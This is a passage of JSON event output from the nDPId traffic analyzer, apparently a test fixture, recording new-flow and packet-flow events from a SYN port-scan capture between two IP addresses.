-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspIkAADYGbemsEAAIQA2GNIzSIzHdUoMYAAAAAGACDAAJXgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAACwG66GsEAAIQA2GNIzSBODdUoMYAAAAAGACBAAvrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoAAACUGAPOsEAAIQA2GNIzSBCLdUoMYAAAAAGACCAAsbQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspaIAACwGdtCsEAAIQA2GNIzSF2TdUoMYAAAAAGACBAAdKwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAswhQAADEGVV6sEAAIQA2GNIzSBP3dUoMYAAAAAGACCAArkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsL3kAADQG5PmsEAAIQA2GNIzSCE7dUoMYAAAAAGACBAAsQQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsCL0AADsGBLasEAAIQA2GNIzSBMDdUoMYAAAAAGACEAAjzwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsWKoAADoGtcisEAAIQA2GNIzSI4PdUoMYAAAAAGACDAAJDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5noAACsGNvisEAAIQA2GNIzSBa\/dUoMYAAAAAGACEAAi4AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAshFYAACUGnxysEAAIQA2GNIzSA\/HdUoMYAAAAAGACCAAsngAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAset0AACcGppWsEAAIQA2GNIzSJxHdUoMYAAAAAGACEAABfgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsAccAACkGHaysEAAIQA2GNIzSIGTdUoMYAAAAAGACCAAQKwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5RsAACYGPVesEAAIQA2GNIzS2TDdUoMYAAAAAGACDABTXgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsSPQAADYGyX6sEAAIQA2GNIzSTiXdUoMYAAAAAGACDADeaQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswj8AAC4GWDOsEAAIQA2GNIzSBAzdUoMYAAAAAGACDAAogwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQjcAACgG3jusEAAIQA2GNIzSF9rdUoMYAAAAAGACBAActQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs9woAADcGGmisEAAIQA2GNIzSHCHdUoMYAAAAAGACEAAMbgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/ToAADsGEDisEAAIQA2GNIzSBB3dUoMYAAAAAGACEAAkcgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgcAACoGcGusEAAIQA2GNIzSgAbdUoMYAAAAAGACDACsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsKF4AAC0G8xSsEAAIQA2GNIzSC7bdUoMYAAAAAGACCAAk2QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAszEUAADsGQS2sEAAIQA2GNIzSB\/\/dUoMYAAAAAGACEAAgkAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsezgAADMGmjqsEAAIQA2GNIzSIAjdUoMYAAAAAGACEAAIhwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswn0AACsGWvWsEAAIQA2GNIzSA3jdUoMYAAAAAGACEAAlFwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAso9kAAC8GdZmsEAAIQA2GNIzShwzdUoMYAAAAAGACEAChggAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAACcGzvisEAAIQA2GNIzSBLHdUoMYAAAAAGACEAAj3gAAAgQFtA=="} 